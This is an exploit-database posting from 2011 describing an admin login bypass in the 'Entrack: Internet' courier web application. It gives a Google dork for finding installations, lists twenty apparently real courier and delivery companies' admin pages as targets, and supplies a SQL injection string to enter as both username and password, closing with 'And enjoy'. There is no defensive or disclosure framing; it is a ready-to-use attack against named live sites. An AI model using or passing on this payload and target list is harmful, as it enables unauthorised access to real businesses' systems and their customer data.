Entrack: Internet Admin Auth Bypass



EKU-ID: 562 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-06-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title:Entrack: Internet Admin Auth Bypass
# Date: 17/6/2011
# Author: Angel Injection & Noor Al-Iraqia
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link:n/a
# Version: n/a
# Category:: webapps
# Google dork:"Entrack: Internet"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
# 1-packageexpress.net/entrack/admin.asp
# 2-mecourier.com/entrack/admin.asp
# 3-cannondelivery.com/entrack/admin.asp
# 4-cannondelivery.com/entrack/admin.asp
# 5-barefootmailmoms.com/entrack/admin.asp
# 6-rudysrush.com/entrack/admin.asp
# 7-sunrisedeliverykc.com/entrack/admin.asp
# 8-rfmcourier.com/entrack/admin.asp
# 9-dixiefreight.com/entrack/admin.asp
# 10-atlasdelivery.com/entrack/admin.asp
# 11-atlantadash.com/entrack/admin.asp
# 12-directlogisticstransport.com/entrack/admin.asp
# 13-cityexpressinc.com/entrack/admin.asp
# 14-redlinecourier.com/entrack/admin.asp
# 15-callcouriernow.com/entrack/admin.asp
# 16-korucutech.com/entrack/admin.asp
# 17-efficientdeliveryservice.com/entrack/admin.asp
# 18-actfastdelivery.com/entrack/admin.asp
# 19-cannondelivery.com/entrack/admin.asp
# 20-otwcourier.com/entrack/admin.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password :  'or''='

And enjoy


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team